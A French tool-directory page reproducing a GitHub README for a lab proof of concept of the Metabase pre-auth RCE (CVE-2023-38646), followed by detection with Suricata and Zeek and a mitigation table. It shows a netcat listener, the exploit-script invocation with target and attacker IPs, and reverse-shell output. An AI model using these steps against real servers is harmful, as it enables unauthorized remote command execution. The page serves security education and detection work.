Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Outils DéfensifsAnalyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionDétection d'IntrusionApprentissage et ÉducationRéponse aux IncidentsDéveloppement de Charges Utiles
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-38646 — Preuve de concept d'exécution de code à distance (RCE) sur Metabase

Vue d'ensemble

Ce dépôt documente un projet de recherche en sécurité de type preuve de concept (PoC) analysant CVE-2023-38646, une vulnérabilité critique d'exécution de code à distance (RCE) avant authentification affectant certaines versions vulnérables de Metabase.

L'objectif de ce projet est de démontrer le cycle de vie complet d'une vulnérabilité réelle, notamment :

  • Comprendre la vulnérabilité et sa cause racine
  • Reproduire l'exploit dans un environnement de laboratoire contrôlé
  • Établir un shell inversé sur le système vulnérable
  • Observer le comportement de l'attaque à l'aide d'outils de surveillance réseau
  • Démontrer des techniques d'ingénierie de détection
  • Proposer des stratégies d'atténuation défensives

Ce dépôt est conçu pour mettre en valeur des compétences pratiques dans :

  • La recherche de vulnérabilités
  • La reproduction d'exploits
  • L'utilisation de shells inversés
  • L'analyse du trafic réseau
  • Les systèmes de détection d'intrusion
  • Les stratégies d'atténuation de sécurité

Contexte de la vulnérabilité

CVE-2023-38646 est une vulnérabilité critique affectant certaines versions de Metabase, une plateforme open source de business intelligence et d'analyse.

La vulnérabilité permet à un attaquant de réaliser une exécution de code à distance sans authentification en exploitant les faiblesses du processus d'installation ou de configuration de l'application.

Télécharger l’outil

Informations clés :

  • Identifiant CVE : CVE-2023-38646
  • Sévérité : Critique
  • Score CVSS : 9.8
  • Vecteur d'attaque : Réseau
  • Authentification requise : Non
  • Impact : Exécution de code à distance (RCE)

Une exploitation réussie permet à un attaquant de :

  • Exécuter des commandes arbitraires sur le système cible
  • Établir un shell inversé
  • Potentiellement obtenir un compromis total du système

Références officielles :

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Technologies et outils utilisés

Ce projet combine à la fois des outils de sécurité offensifs et des outils de surveillance défensifs.

Sécurité offensive

  • Python
  • Payloads de shell inversé
  • Script d'exploit personnalisé
  • Instance Metabase vulnérable

Détection et surveillance

  • Suricata — Système de détection d'intrusion (IDS)
  • Zeek — Surveillance de la sécurité réseau (NSM)

Technologies défensives

  • ModSecurity — Pare-feu applicatif web
  • OSSEC — Système de détection d'intrusion basé sur l'hôte

Environnement de laboratoire

Espace réservé — décrivez votre configuration de laboratoire

Exemple :

  • Machine de l'attaquant : Kali Linux
  • Machine cible : Serveur Metabase vulnérable
  • Machine de surveillance réseau : VM de surveillance de sécurité

PoC d'exploitation

Schéma de la chaîne d'attaque

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

Ce schéma illustre le flux d'attaque de haut niveau utilisé dans ce projet.

Configuration de la preuve de concept (PoC)

Installation et configuration de Docker :

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Lancement de Docker :

Une instance Metabase Enterprise vulnérable (v1.44.0) a été déployée à l'aide de Docker.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Cela expose l'interface web de Metabase sur le port 3000, permettant d'accéder à la page de configuration.

Si Docker est déjà en cours d'exécution, exécutez les lignes de commande suivantes pour repartir de zéro :

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

Espace réservé « Configuration de Docker »

Une fois le conteneur en cours d'exécution, l'interface Metabase devient accessible via le navigateur.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

La page de configuration confirme que l'instance Metabase est active et prête pour la configuration.

Scénario d'exploitation 1

BurpSuite

Démo / Documentation

Espace réservé pour captures d'écran ou explication

Scénario d'exploitation 2 — Exploitation par script Python

  1. Préparation de l'écouteur du shell inversé

Avant de lancer l'exploit, un écouteur Netcat est démarré sur la machine de l'attaquant pour recevoir la connexion du shell inversé.

root@kitploit:~
    nc -lvnp 6666

Cet écouteur attend les connexions entrantes provenant du serveur Metabase exploité.

Espace réservé pour captures d'écran ou explication

  1. Exécution de l'exploit Le script d'exploit est exécuté depuis la machine de l'attaquant.
root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

Le payload exécute une commande qui établit un shell inversé vers la machine de l'attaquant.

  1. Shell inversé établi Une fois le payload exécuté avec succès, l'instance Metabase vulnérable initie une connexion de retour vers la machine de l'attaquant.

L'écouteur Netcat reçoit la connexion, accordant à l'attaquant un accès shell au système.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Pour confirmer la connexion à la machine de la victime :

root@kitploit:~
    whoami

Sortie :

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

PoC d'ingénierie de détection

Ce projet démontre également comment l'activité d'exploitation peut être détectée à l'aide d'outils de surveillance réseau.

Détection avec Suricata

Suricata (IDS) a été utilisé pour surveiller le trafic réseau à la recherche de schémas suspects associés à l'exploit.

root@kitploit:~
sudo suricata -i eth0

Espace réservé : insérez la capture d'écran de l'alerte Suricata

root@kitploit:~
evidence/detection/suricata_alert.png

Pour observer les alertes en temps réel, les journaux de Suricata ont été surveillés à l'aide de :

root@kitploit:~
tail -f /var/log/suricata/fast.log

Espace réservé : insérez la capture d'écran du journal Suricata

root@kitploit:~
evidence/detection/suricata_log.png

Pour une approche passive, un script de notification personnalisé a été utilisé pour générer des alertes de bureau à chaque fois que Suricata détecte un trafic suspect.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

Lorsque l'exploit a été exécuté, Suricata a généré des alertes indiquant une activité suspecte associée à la tentative d'exploitation de Metabase.

Espace réservé : insérez la capture d'écran du journal Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Exemple :

Espace réservé : insérez la capture d'écran du journal Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Analyse réseau avec Zeek

En plus de la surveillance IDS, Zeek a été utilisé pour analyser le trafic réseau et identifier les comportements anormaux.

Zeek est lancé à l'aide des commandes suivantes pour commencer à capturer et analyser le trafic réseau :

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Espace réservé : insérez la capture d'écran du lancement de Zeek

root@kitploit:~
evidence/detection/zeek.png

En inspectant les journaux de connexion, le trafic du shell inversé sur le port 6666 peut être observé.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Espace réservé : insérez la capture d'écran du journal Zeek

root@kitploit:~
evidence/detection/zeek_log.png

Stratégies d'atténuation et défensives

Plusieurs stratégies d'atténuation peuvent réduire le risque d'exploitation.

StratégieDescription
Gestion des correctifsMettre à niveau Metabase vers une version qui corrige CVE-2023-38646
Pare-feu applicatif web (ModSecurity)Filtrer les requêtes HTTP malveillantes
Détection d'intrusion hôte (OSSEC)Surveiller les comportements système suspects
Surveillance réseau (Suricata & Zeek)Détecter les schémas de trafic anormaux

Structure du dépôt

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Résumé

Ce projet démontre le cycle de vie complet de l'analyse et de la reproduction d'une vulnérabilité critique réelle.

Le PoC met en évidence :

  • analyse de vulnérabilité
  • reproduction d'exploits
  • exécution de shell inversé
  • surveillance du trafic réseau
  • détection d'intrusion
  • stratégies d'atténuation défensives

L'objectif de ce dépôt est de fournir une étude de cas technique illustrant à la fois les pratiques de cybersécurité offensives et défensives.


🖋️ Auteur

Styverson Ng

Bachelor en technologies de l'information
Intelligence artificielle et systèmes autonomes
Cybersécurité et cybercriminalistique

Murdoch University